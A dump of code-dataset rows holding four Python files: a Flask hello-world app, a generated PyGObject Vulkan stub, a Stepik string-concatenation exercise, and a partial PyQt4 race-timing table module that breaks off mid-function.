blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 3 to 616) | content_id (string, len 40) | detected_licenses (list, len 0 to 112) | license_type (string, 2 classes) | repo_name (string, len 5 to 115) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (string, 777 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06) | github_id (int64, 4.92k to 681M, nullable) | star_events_count (int64, 0 to 209k) | fork_events_count (int64, 0 to 110k) | gha_license_id (string, 22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable) | gha_language (string, 149 classes) | src_encoding (string, 26 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 3 to 10.2M) | extension (string, 188 classes) | content (string, len 3 to 10.2M) | authors (list, len 1) | author_id (string, len 1 to 132)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
a75a6a9fff392c36a2f7ea0a26ceb9742e30b997 | 1a2bf34d7fc1d227ceebf05edf00287de74259c5 | /flask/Day02/fisher.py | 1cc4adb358cfd1bff444552db2490d00e0e84b5b | []
| no_license | lzn9423362/Django- | de69fee75160236e397b3bbc165281eadbe898f0 | 8c1656d20dcc4dfc29fb942b2db54ec07077e3ae | refs/heads/master | 2020-03-29T18:03:47.323734 | 2018-11-28T12:07:12 | 2018-11-28T12:07:12 | 150,192,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | # Import the Flask class from the flask framework
from flask import Flask

# Initialize a Flask object.
# It must be passed one argument, __name__, which:
# 1. lets the flask framework locate resources
# 2. helps flask extensions such as Flask-SQLAlchemy pinpoint where an error occurred
app = Flask(__name__)

@app.route('/')
def hello_world():
    return 'hello world'

# If this file is run as the entry-point program, execute app.run()
if __name__ == '__main__':
    # Start an application server to accept user requests
    app.run(host='0.0.0.0') | [
"[email protected]"
]
| |
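The comments above cover why `__name__` is passed to `Flask`; the route itself can also be smoke-tested without starting a server. A minimal sketch using Flask's built-in test client (the `fisher` import path assumes the file above is saved as `fisher.py` on the import path):

```python
# Hypothetical smoke test for the app defined above.
from fisher import app  # assumes the snippet is saved as fisher.py

def test_hello_world():
    client = app.test_client()  # WSGI test client; no server process needed
    response = client.get('/')
    assert response.status_code == 200
    assert response.data == b'hello world'

if __name__ == '__main__':
    test_hello_world()
    print('ok')
```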
a813c48c1eaee83257117b19fbeecd6ea97aaf61 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Vulkan/DescriptorSetLayoutBinding.py | 0479636cd1074bcea3d9e51d4a14b5da89e17818 | []
| no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,259 | py | # encoding: utf-8
# module gi.repository.Vulkan
# from /usr/lib64/girepository-1.0/Vulkan-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
class DescriptorSetLayoutBinding(__gi.Struct):
    # no doc
    def __delattr__(self, *args, **kwargs): # real signature unknown
        """ Implement delattr(self, name). """
        pass

    def __dir__(self, *args, **kwargs): # real signature unknown
        """ Default dir() implementation. """
        pass

    def __eq__(self, *args, **kwargs): # real signature unknown
        """ Return self==value. """
        pass

    def __format__(self, *args, **kwargs): # real signature unknown
        """ Default object formatter. """
        pass

    def __getattribute__(self, *args, **kwargs): # real signature unknown
        """ Return getattr(self, name). """
        pass

    def __ge__(self, *args, **kwargs): # real signature unknown
        """ Return self>=value. """
        pass

    def __gt__(self, *args, **kwargs): # real signature unknown
        """ Return self>value. """
        pass

    def __hash__(self, *args, **kwargs): # real signature unknown
        """ Return hash(self). """
        pass

    def __init_subclass__(self, *args, **kwargs): # real signature unknown
        """
        This method is called when a class is subclassed.

        The default implementation does nothing. It may be
        overridden to extend subclasses.
        """
        pass

    def __init__(self, *args, **kwargs): # real signature unknown
        pass

    def __le__(self, *args, **kwargs): # real signature unknown
        """ Return self<=value. """
        pass

    def __lt__(self, *args, **kwargs): # real signature unknown
        """ Return self<value. """
        pass

    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object. See help(type) for accurate signature. """
        pass

    def __ne__(self, *args, **kwargs): # real signature unknown
        """ Return self!=value. """
        pass

    def __reduce_ex__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass

    def __reduce__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass

    def __repr__(self, *args, **kwargs): # real signature unknown
        """ Return repr(self). """
        pass

    def __setattr__(self, *args, **kwargs): # real signature unknown
        """ Implement setattr(self, name, value). """
        pass

    def __sizeof__(self, *args, **kwargs): # real signature unknown
        """ Size of object in memory, in bytes. """
        pass

    def __str__(self, *args, **kwargs): # real signature unknown
        """ Return str(self). """
        pass

    def __subclasshook__(self, *args, **kwargs): # real signature unknown
        """
        Abstract classes can override this to customize issubclass().

        This is invoked early on by abc.ABCMeta.__subclasscheck__().
        It should return True, False or NotImplemented. If it returns
        NotImplemented, the normal algorithm is used. Otherwise, it
        overrides the normal algorithm (and the outcome is cached).
        """
        pass

    def __weakref__(self, *args, **kwargs): # real signature unknown
        pass

    __class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
    __dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(DescriptorSetLayoutBinding), '__module__': 'gi.repository.Vulkan', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'DescriptorSetLayoutBinding' objects>, '__weakref__': <attribute '__weakref__' of 'DescriptorSetLayoutBinding' objects>, '__doc__': None})"
    __gtype__ = None # (!) real value is '<GType void (4)>'
    __info__ = StructInfo(DescriptorSetLayoutBinding)
| [
"[email protected]"
]
| |
dc8ac8f98abdd3d2476ff6576232b08b43103914 | b6fc54cff7037f5e4ef26cb4a645d5ea5a6fecdf | /000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p03st06TASK06_20210205_datatypes.py | 117d126123441b6fb42d7d39b655d4b2bc394545 | [
"Apache-2.0"
]
| permissive | SafonovMikhail/python_000577 | 5483eaf2f7c73bc619ce1f5de67d8d689d2e7dd4 | f2dccac82a37df430c4eb7425b5d084d83520409 | refs/heads/master | 2022-12-08T10:53:57.202746 | 2022-12-07T09:09:51 | 2022-12-07T09:09:51 | 204,713,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | '''
Write a program that reads two strings and prints their concatenation to the screen
Note: concatenation is the "addition" operation on two strings
Sample Input 1:
Programming language
Python
Sample Output 1:
Programming languagePython
Sample Input 2:
37
81
Sample Output 2:
3781
'''
s1, s2 = input(), input()
print(s1 + s2)
| [
"[email protected]"
]
| |
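The note above is the whole point of the exercise: `input()` always returns `str`, so `+` concatenates rather than adds. A short sketch of the contrast:

```python
a, b = "37", "81"          # what input() would hand back
print(a + b)               # 3781 -- string concatenation
print(int(a) + int(b))     # 118  -- numeric addition after conversion
```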
058a05a4499c06f74891be9ead56d0e1c7689246 | 5810e290cd89e6e6d04cb19fb7af063c8a868b4c | /Aplikace_1_0/Source/ewitis/gui/dfTableTimes.py | e6d00fbe89517001b771345c60e5e2aa72553e40 | []
| no_license | amoydream/ew_aplikace | 0a0e1af79aa74378e4040cb563c4d573f8af9ebf | f7868d4924dc2cae6ab79efda4662aee7465bdbf | refs/heads/master | 2023-06-14T06:25:40.122872 | 2021-07-12T21:07:56 | 2021-07-12T21:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,291 | py | # -*- coding: utf-8 -*-
'''
Created on 30.07.2015
@author: Meloun
'''
import time, os
import pandas as pd
from PyQt4 import QtCore, QtGui
from libs.myqt.DataframeTableModel import DataframeTableModel
from libs.utils.ListOfDicts import ListOfDicts
import libs.utils.utils as utils
import libs.timeutils.timeutils as timeutils
from ewitis.data.DEF_ENUM_STRINGS import COLORS, STATUS
import ewitis.gui.TimesUtils as TimesUtils
import libs.pandas.df_utils as df_utils
from ewitis.data.DEF_DATA import *
from ewitis.gui.dfTableUsers import tableUsers
from ewitis.gui.dfTableCategories import tableCategories
from ewitis.gui.dfTableCGroups import tableCGroups
import ewitis.gui.dfTableTimesExport as ttExport
import ewitis.gui.dfTableTimesAutonumbers as ttAutonumbers
import ewitis.gui.dfTableTimesAutocell as ttAutocell
from ewitis.data.db import db
from ewitis.gui.dfTable import DfTable
from ewitis.data.dstore import dstore
from ewitis.gui.Ui import Ui
from ewitis.gui.multiprocessingManager import mgr, eventCalcNow, eventCalcReady
from ewitis.gui.UiAccesories import uiAccesories, MSGTYPE
from ewitis.gui.tabExportSettings import tabExportSettings
import ewitis.exports.ewitis_html as ew_html
CONF_TABLE_TIMES = [
{'name': 'id', 'length':0, 'default': True, "editable": False },
{'name': 'nr', 'length':0, 'default': True, "editable": True },
{'name': 'cell', 'length':0, 'default': True, "editable": True },
{'name': 'status', 'length':0, 'default': True, "editable": True },
{'name': 'time1', 'length':0, 'default': True, "editable": False },
{'name': 'lap1', 'length':0, 'default': True, "editable": False },
{'name': 'time2', 'length':0, 'default': True, "editable": False },
{'name': 'lap2', 'length':0, 'default': True, "editable": False },
{'name': 'time3', 'length':0, 'default': True, "editable": False },
{'name': 'lap3', 'length':0, 'default': True, "editable": False },
{'name': 'time4', 'length':0, 'default': True, "editable": False },
{'name': 'lap4', 'length':0, 'default': True, "editable": False },
{'name': 'name', 'length':0, 'default': True, "editable": False },
{'name': 'category', 'length':0, 'default': True, "editable": False },
{'name': 'order1', 'length':0, 'default': True, "editable": False },
{'name': 'order2', 'length':0, 'default': True, "editable": False },
{'name': 'order3', 'length':0, 'default': True, "editable": False },
{'name': 'start', 'length':0, 'default': True, "editable": False },
{'name': 'points1', 'length':0, 'default': True, "editable": False },
{'name': 'points2', 'length':0, 'default': True, "editable": False },
{'name': 'points3', 'length':0, 'default': True, "editable": False },
{'name': 'points4', 'length':0, 'default': True, "editable": False },
{'name': 'points5', 'length':0, 'default': True, "editable": False },
{'name': 'un1', 'length':0, 'default': True, "editable": True },
{'name': 'un2', 'length':0, 'default': True, "editable": True },
{'name': 'un3', 'length':0, 'default': True, "editable": True },
{'name': 'us1', 'length':0, 'default': True, "editable": True },
{'name': 'timeraw', 'length':0, 'default': True, "editable": True },
]
'''
Model
'''
class DfModelTimes(DataframeTableModel):
def __init__(self, table):
super(DfModelTimes, self).__init__(table)
self.df = pd.DataFrame()
self.conf = ListOfDicts(CONF_TABLE_TIMES)
self.db_con = db.getDb()
self.changed_rows = pd.DataFrame()
self.mynr = 0
def flags(self, index):
column_name = self.df.columns[index.column()]
editable_columns = self.conf.Get("name", ("editable", True))
if(column_name in editable_columns):
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def data(self, index, role=QtCore.Qt.DisplayRole):
if (role == QtCore.Qt.BackgroundRole):
if dstore.Get("times")["highlight_enable"]:
try:
row = self.df.iloc[index.row()]
#no number and no user string
if row['nr']== 0 and row['us1'] == '':
return QtGui.QColor(COLORS.peachorange)
#changed rawtime -> yellow
elif row['state'][0]== 'C':
return QtGui.QColor(COLORS.yellow)
#time on request -> lila
elif row['state'][1] == 'R':
return QtGui.QColor(COLORS.lila)
#manual time -> green
elif row['state'][2]== 'M':
return QtGui.QColor(COLORS.light_green)
except:
pass
return
return DataframeTableModel.data(self, index, role)
def IsColumnAutoEditable(self, column):
'''If True, focus moves to the next row after a user edit.'''
#number and cell
if(column == 1) or (column == 2):
return True
return False
def getDefaultRow(self):
row = DataframeTableModel.getDefaultRow(self)
row["cell"] = 250
return row
def sModelChanged(self, index1, index2):
DataframeTableModel.sModelChanged(self, index1, index2)
def GetDataframe(self):
df = mgr.GetDfs()["table"]
if eventCalcReady.is_set() == False:
for index, row in self.changed_rows.iterrows():
if index in df.index:
df.loc[index] = row
else:
self.changed_rows = pd.DataFrame()
#ToDo: remove
#mynr = len(df.index)
#print "mynr:", mynr
#if(mynr > self.mynr):
# print "TT: new record", time.clock()
#self.mynr = mynr
return df
def setDataFromDict(self, mydict):
print "setDataFromDict()", mydict, self.name
#dict => df
dfChange = pd.DataFrame([mydict])
dfChange.set_index(dfChange.id, inplace=True)
#take row before change (from global df)
dfChangedRow = self.df.loc[dfChange.id]
#take user before change
old_user = tableUsers.model.getUserParNr(int(dfChangedRow['nr']))
#update row before change with change
dfChangedRow.update(dfChange)
#category changed
if "nr" in mydict:
user_id = self.checkChangedNumber(dfChangedRow.iloc[0])
if user_id == None: #dialog inside checkChangedNumber()
return False
#adjust dict for writing to db
mydict["user_id"] = user_id
if mydict["nr"] < 0:
mydict["us1"] = "Civil #"+str(abs(mydict["nr"]))
del mydict["nr"]
elif "cell" in mydict:
pass
# TIMERAW column
elif "timeraw" in mydict:
try:
dbTimeraw = TimesUtils.TimesUtils.timestring2time(mydict['timeraw'])
except TimesUtils.TimeFormat_Error:
uiAccesories.showMessage(self.name+" Update error", "Wrong Time format!")
return False
#adjust dict for writing to db
mydict["time_raw"] = dbTimeraw
del mydict["timeraw"]
#change the state (C -> manually Changed)
state = str(dfChangedRow.iloc[0]['state'])
mydict["state"] = "C" + state[1:]
elif "un1" in mydict:
pass
elif "un2" in mydict:
pass
elif "un3" in mydict:
pass
elif "us1" in mydict:
pass
else:
uiAccesories.showMessage(self.name+" Update error", "Unexpecting change!")
return False
# add changed row to "changed_rows"
# keep as dataframe otherwise float issues for "nr" and "cell"
cleared = self.ClearCalculated(dfChangedRow.iloc[0].copy())
self.changed_rows = self.changed_rows.append(cleared)
try:
self.changed_rows["nr"] = int(self.changed_rows["nr"])
self.changed_rows["cell"] = int(self.changed_rows["cell"])
except:
pass
eventCalcReady.clear() #s
#update db from mydict
db.update_from_dict(self.name, mydict)
#user changed => reset all times for new user
if mydict and ("user_id" in mydict):
#print "mazu vsechny1", mydict["user_id"]
self.ResetCalculatedValuesForUser(mydict["user_id"])
#reset 1 time
elif mydict and ("id" in mydict):
#print "mazu neco", mydict["id"]
self.ResetCalculatedValues(mydict["id"])
if old_user and ("id" in old_user):
print "mazu vsechny2", old_user["id"]
self.ResetCalculatedValuesForUser(old_user["id"])
#self.ResetNrOfLaps()
eventCalcNow.set()
return True
def ClearCalculated(self, tabRow):
for i in range(0, NUMBER_OF.TIMESCOLUMNS):
tabRow["time"+str(i+1)] = None
tabRow["lap"+str(i+1)] = None
for i in range(0, NUMBER_OF.THREECOLUMNS):
tabRow["order"+str(i+1)] = None
for i in range(0, NUMBER_OF.POINTSCOLUMNS):
tabRow["points"+str(i+1)] = None
tabRow["status"] = "wait"
#precalculate name and category
user = tableUsers.model.getUserParNr(tabRow["nr"])
if user:
if(user['name']):
tabRow['name'] = user['name'].upper()
user['name'] = user['name'] +' '+user['first_name']
tabRow['category'] = user['category']
return tabRow
def checkChangedNumber(self, tabRow):
'''NUMBER CHANGE'''
'''- checks the user, category and tag
- returns user_id!!
'''
#print "checkChangedNumber", tabRow
if(tabRow["nr"] == 0):
user_id = 0
else:
#rigthts to change start cell?
if(tabRow['cell'] == 1) and (dstore.GetItem("racesettings-app" ,["evaluation", "starttime"]) == StarttimeEvaluation.VIA_CATEGORY):
uiAccesories.showMessage(self.name+" Update error", "Cannot assign user to start time!")
return None
#user exist?
user = tableUsers.model.getUserParNr(int(tabRow['nr']))
if user == None:
uiAccesories.showMessage(self.name+" Update error", "User nr. "+ str(tabRow['nr'])+" not found !")
QtCore.QTimer.singleShot(100, lambda: self.table.Edit())
return None
#category exist?
category = tableCategories.model.getCategoryParName(user['category'])
if category.empty:
uiAccesories.showMessage(self.name+" Update error", "Category not found " + str(user['category']))
return None
#user id exist?
user_id = tableUsers.model.getIdOrTagIdParNr(user['nr'])
if user_id == None:
uiAccesories.showMessage(self.name+": Update error", "No user or tag with number "+str(tabRow['nr'])+"!")
return None
return user_id
def ResetCalculatedValues(self, timeid):
query = \
" UPDATE times" +\
" SET time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null" +\
" WHERE (times.id = \""+str(timeid)+"\")"
res = db.query(query)
db.commit()
return res
def ResetCalculatedValuesForUser(self, user_id):
query = \
" UPDATE times" +\
" SET time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null" +\
" WHERE (times.user_id = \""+str(user_id)+"\")"
res = db.query(query)
db.commit()
return res
def ResetNrOfLaps(self):
query = \
" UPDATE times" +\
" SET lap1 = Null, lap2 = Null, lap3 = Null, lap4 = Null"
res = db.query(query)
db.commit()
return res
'''
Proxy Model
'''
class DfProxymodelTimes(QtGui.QSortFilterProxyModel):
def __init__(self, parent = None):
QtGui.QSortFilterProxyModel.__init__(self, parent)
self.myclass = None
#This property holds whether the proxy model is dynamically sorted and filtered whenever the contents of the source model change.
self.setDynamicSortFilter(True)
#This property holds the column where the key used to filter the contents of the source model is read from.
#The default value is 0. If the value is -1, the keys will be read from all columns.
self.setFilterKeyColumn(-1)
'''
Table
'''
class DfTableTimes(DfTable):
def __init__(self):
self.init = False
DfTable.__init__(self, "Times")
def InitGui(self):
DfTable.InitGui(self)
self.gui['civils_to_zeroes'] = Ui().TimesCivilsToZeroes
self.gui['recalculate'] = Ui().TimesRecalculate
self.gui['aWwwExportDirect'] = Ui().aWwwExportDirect
self.gui['aWwwExportLogo'] = Ui().aWwwExportLogo
self.gui['aExportResults'] = Ui().aExportResults
self.gui['aExportResultsDNF'] = Ui().aExportResultsDNF
self.gui['aExportDbResults'] = Ui().aExportDbResults
self.gui['aExportDbResultsDNF'] = Ui().aExportDbResultsDNF
self.gui['aExportAllTimes'] = Ui().aExportAllTimes
self.gui['aExportLaptimes'] = Ui().aExportLaptimes
try:
self.gui['times_db_export'] = Ui().TimesDbExport
self.gui['times_db_import'] = Ui().TimesDbImport
except AttributeError:
pass
self.gui['filter_column'] = Ui().TimesFilterColumn
self.gui['filter_starts'] = Ui().TimesFilterStarts
self.gui['filter_finishes'] = Ui().TimesFilterFinishes
self.gui['auto_refresh'] = Ui().TimesAutoRefresh
ttAutonumbers.InitGui()
ttAutocell.InitGui()
self.gui['auto_refresh_clear'] = Ui().TimesAutoRefreshClear
self.gui['auto_www_refresh'] = Ui().TimesAutoWWWRefresh
self.gui['auto_www_refresh_clear'] = Ui().TimesAutoWWWRefreshClear
self.gui['highlight_enable'] = Ui().TimesHighlightEnable
self.gui['auto_timer_set'] = Ui().TimerSet
self.gui['auto_timer_get'] = Ui().TimerGet
self.gui['auto_timer_icon'] = Ui().TimerIcon
self.auto_timer_cnt = 0
self.auto_timer_green_cnt = 5
self.timericon_grey = QtGui.QIcon("gui/icons/Circle_Grey_34212.png")
self.timericon_green = QtGui.QIcon("gui/icons/Circle_Green_34211.png")
self.timericon_yellow = QtGui.QIcon("gui/icons/Circle_Yellow_34215.png")
self.timericon_orange = QtGui.QIcon("gui/icons/Circle_Orange_34213.png")
self.timericon_red = QtGui.QIcon("gui/icons/Circle_Red_34214.png")
def Init(self):
DfTable.Init(self)
#set sort rules
self.gui['view'].sortByColumn(28, QtCore.Qt.DescendingOrder)
self.UpdateGui()
self.dfActiveNrs = pd.DataFrame()
self.init = True
def sDeletePreCallback(self, id):
dfRow = self.model.df.loc[id] #take row (from global df)
user = tableUsers.model.getUserParNr(int(dfRow['nr'])) #take user
#reset values for all times of this user
if user != None:
self.model.ResetCalculatedValuesForUser(user["id"])
return True
def createSlots(self):
#standart slots
DfTable.createSlots(self)
#filter starts/finishes
QtCore.QObject.connect(self.gui['filter_starts'], QtCore.SIGNAL("clicked()"), self.sFilterStarts)
QtCore.QObject.connect(self.gui['filter_finishes'], QtCore.SIGNAL("clicked()"), self.sFilterFinishes)
#autonumbers
ttAutonumbers.createSlots()
#autocell
ttAutocell.createSlots()
#
QtCore.QObject.connect(self.gui['auto_refresh'], QtCore.SIGNAL("valueChanged(int)"), lambda state: (uiAccesories.sGuiSetItem("times", ["auto_refresh"], state, self.UpdateGui), setattr(self, "auto_refresh_cnt", state)))
QtCore.QObject.connect(self.gui['auto_www_refresh'], QtCore.SIGNAL("valueChanged(int)"), lambda state: (uiAccesories.sGuiSetItem("times", ["auto_www_refresh"], state, self.UpdateGui), setattr(self, "auto_www_refresh_cnt", state)))
QtCore.QObject.connect(self.gui['auto_refresh_clear'], QtCore.SIGNAL("clicked()"), lambda: uiAccesories.sGuiSetItem("times", ["auto_refresh"], 0, self.UpdateGui))
QtCore.QObject.connect(self.gui['auto_www_refresh_clear'], QtCore.SIGNAL("clicked()"), lambda: uiAccesories.sGuiSetItem("times", ["auto_www_refresh"], 0, self.UpdateGui))
QtCore.QObject.connect(self.gui['highlight_enable'], QtCore.SIGNAL("stateChanged(int)"), lambda state: uiAccesories.sGuiSetItem("times", ["highlight_enable"], state, self.UpdateGui))
QtCore.QObject.connect(self.gui['auto_timer_set'], QtCore.SIGNAL("valueChanged(int)"), lambda state: (uiAccesories.sGuiSetItem("times", ["auto_timer"], state, self.UpdateGui), setattr(self, "auto_timer_cnt", state)))
#button Recalculate
QtCore.QObject.connect(self.gui['civils_to_zeroes'], QtCore.SIGNAL("clicked()"), lambda:self.sCivilsToZeroes())
QtCore.QObject.connect(self.gui['recalculate'], QtCore.SIGNAL("clicked()"), lambda:self.sRecalculate())
#exports
QtCore.QObject.connect(self.gui['aWwwExportDirect'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eHTM_EXPORT))
QtCore.QObject.connect(self.gui['aWwwExportLogo'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eHTM_EXPORT_LOGO))
QtCore.QObject.connect(self.gui['aExportResults'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT))
QtCore.QObject.connect(self.gui['aExportResultsDNF'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT_DNS))
QtCore.QObject.connect(self.gui['aExportDbResults'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT_DB))
QtCore.QObject.connect(self.gui['aExportDbResultsDNF'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT_DNS_DB))
def sSlot(self, state = False):
print "sSlot", state
def EditingFinished(self, x):
print "self.EditingFinished", x
def sCivilsToZeroes(self):
if (uiAccesories.showMessage("Civils to zeroes", "Are you sure you want to set civils numbers to zeroes?", MSGTYPE.warning_dialog) != True):
return
print "A: Times: Civils to zeroes.. "
query = \
" UPDATE times" +\
" SET user_id=0, time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null" +\
" WHERE (times.user_id > 100000)"
res = db.query(query)
db.commit()
eventCalcNow.set()
print "A: Times: Civils to zeroes.. press F5 to finish"
return res
def sRecalculate(self):
if (uiAccesories.showMessage("Recalculate", "Are you sure you want to recalculate times and laptimes?", MSGTYPE.warning_dialog) != True):
return
query = \
" UPDATE times" +\
" SET time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null"
res = db.query(query)
#self.ResetStatus()
db.commit()
eventCalcNow.set()
print "A: Times: Recalculating.. press F5 to finish"
return res
def sFilterStarts(self):
self.gui['filter_column'].setValue(2)
self.gui['filter'].setText("1")
def sFilterFinishes(self):
self.gui['filter_column'].setValue(2)
self.gui['filter'].setText("250")
'''
F11, F12 - final results
- prepare DFs for export (according to filter, sort, etc.)
- call ExportToXXXFiles with these 3 DFs
'''
def sExportDirect(self, export_type = ttExport.eCSV_EXPORT):
#ret = uiAccesories.showMessage("Results Export", "Choose format of results", MSGTYPE.question_dialog, "NOT finally results", "Finally results")
#if ret == False: #cancel button
# return
# 3DFs for 3 exports
exportDf = [pd.DataFrame()] * NUMBER_OF.EXPORTS
exported = {}
ttDf = self.model.GetDataframe() #self.model.df
utDf = pd.DataFrame()
#merge table users and times
if len(ttDf) != 0:
cols_to_use = tableUsers.model.df.columns.difference(self.model.df.columns)
cols_to_use = list(cols_to_use) + ["nr"]
utDf = pd.merge(ttDf, tableUsers.model.df[cols_to_use], how = "left", on="nr")
#call export function
if (len(ttDf) != 0) or (export_type == ttExport.eHTM_EXPORT_LOGO):
try:
exported = ttExport.Export(utDf, export_type)
except IOError:
uiAccesories.showMessage("Export", time.strftime("%H:%M:%S", time.localtime())+" :: NOT succesfully, cannot write into the file.", MSGTYPE.statusbar)
return
#dialog message
exported_string = ""
for key in sorted(exported.keys()):
exported_string += key + " : " + str(exported[key])+" times\n"
if export_type == ttExport.eHTM_EXPORT or export_type == ttExport.eHTM_EXPORT_LOGO:
uiAccesories.showMessage("WWW Export", time.strftime("%H:%M:%S", time.localtime())+" :: exported "+exported_string, MSGTYPE.statusbar)
else:
uiAccesories.showMessage("Table Times Exported", exported_string, MSGTYPE.info)
return
'''
end of SLOTS
'''
def AutoUpdate(self):
ztime = time.clock()
autorefresh = dstore.GetItem("times", ["auto_refresh"])
if(autorefresh == 0):
pass
elif(self.auto_refresh_cnt == 0):
self.auto_refresh_cnt = autorefresh
elif((self.auto_refresh_cnt-1) != 0):
self.auto_refresh_cnt = self.auto_refresh_cnt - 1
else:
#print "auto update", self.auto_refresh_cnt, autorefresh, "s"
self.auto_refresh_cnt = autorefresh
ret = self.Update()
if(ret == True):
localtime = time.strftime("%H:%M:%S", time.localtime())
updatetime = str(time.clock() - ztime)[0:5]+"s"
calctime = str(mgr.GetInfo()["lastcalctime"])[0:5]+"s"
uiAccesories.showMessage("Auto Refresh", localtime + " :: update: "+updatetime +" / calc: "+ str(calctime), MSGTYPE.statusbar)
#uiAccesories.showMessage("Auto Refresh", time.strftime("%H:%M:%S", time.localtime())+" ("+str(time.clock() - ztime)[0:5]+"s)", MSGTYPE.statusbar) ztime = time.clock()
else:
print "AutoUpdate: KO"
autorefresh = dstore.GetItem("times", ["auto_www_refresh"])
if(autorefresh == 0):
pass
elif(self.auto_www_refresh_cnt == 0):
self.auto_www_refresh_cnt = autorefresh
elif((self.auto_www_refresh_cnt-1) != 0):
self.auto_www_refresh_cnt = self.auto_www_refresh_cnt - 1
else:
#print "auto update", self.auto_refresh_cnt, autorefresh, "s"
self.auto_www_refresh_cnt = autorefresh
ret = self.sExportDirect(ttExport.eHTM_EXPORT)
#decrement the timer
if(self.auto_timer_cnt > 0):
self.auto_timer_cnt = self.auto_timer_cnt - 1
self.auto_timer_green_cnt = 5
#update the get value
self.gui['auto_timer_get'].setText(str(self.auto_timer_cnt)+" s")
#update the icon
autorefresh_set = dstore.GetItem("times", ["auto_timer"])
if(autorefresh_set == 0):
self.gui['auto_timer_icon'].setIcon(self.timericon_grey)
elif(self.auto_timer_cnt == 0):
#after 5s the green is blinking
if self.auto_timer_green_cnt == 0:
self.gui['auto_timer_icon'].setIcon(self.timericon_grey)
self.auto_timer_green_cnt = 1
else:
self.gui['auto_timer_icon'].setIcon(self.timericon_green)
self.auto_timer_green_cnt = self.auto_timer_green_cnt - 1
elif(self.auto_timer_cnt <= 5):
self.gui['auto_timer_icon'].setIcon(self.timericon_yellow)
elif((self.auto_timer_cnt-1) != 0):
self.gui['auto_timer_icon'].setIcon(self.timericon_red)
else:
self.auto_timer_cnt = autorefresh_set
#called periodically, timer 1,5s
def Update_AutoNumbers(self, new_time):
ret = False
#auto timer
if new_time["cell"] == 1:
self.auto_timer_cnt = dstore.GetItem("times", ["auto_timer"])
#auto numbers
ds_times = dstore.Get("times")
if(ds_times["auto_number_enable"] and ds_times["auto_number_logic"]):
updates = ttAutonumbers.Update(self.model.GetDataframe(), new_time)
#print "00: Update_AutoNumbers: ", updates, time.clock()
#self.model.Update()
for update in updates:
user = tableUsers.model.getUserParNr(int(update['nr']))
if user != None:
#update user id in db
if user["nr"] < 0:
#for civils also write name to user string
db.update_from_dict(self.model.name, {"id":update["id"], "user_id":user["id"], "us1":user["name"]})
else:
db.update_from_dict(self.model.name, {"id":update["id"], "user_id":user["id"]})
print "I: auto number: update:", update['nr'], "id:", update["id"]
ret = True #only one number at once
if ret == True:
eventCalcNow.set()
return ret
def Get_ActiveNumbers(self):
ret_list = []
if 'nr' in self.dfActiveNrs:
return self.dfActiveNrs["nr"].tolist()
return ret_list
def Update_ActiveNumbers(self):
ttDf = self.model.GetDataframe()
if 'nr' in ttDf.columns:
ttDf = ttDf.groupby("nr", as_index = False).last()
self.dfActiveNrs = ttDf[(ttDf.cell!=250) & (ttDf.status.str.match('race'))]
def UpdateGui(self):
DfTable.UpdateGui(self)
times = dstore.Get("times")
self.gui['highlight_enable'].setCheckState(times["highlight_enable"])
#autonumbers
ttAutonumbers.UpdateGui()
#autocell
ttAutocell.UpdateGui()
self.gui['auto_refresh'].setValue(times["auto_refresh"])
self.gui['auto_www_refresh'].setValue(times["auto_www_refresh"])
#stylesheets
if(times["auto_refresh"] == 0):
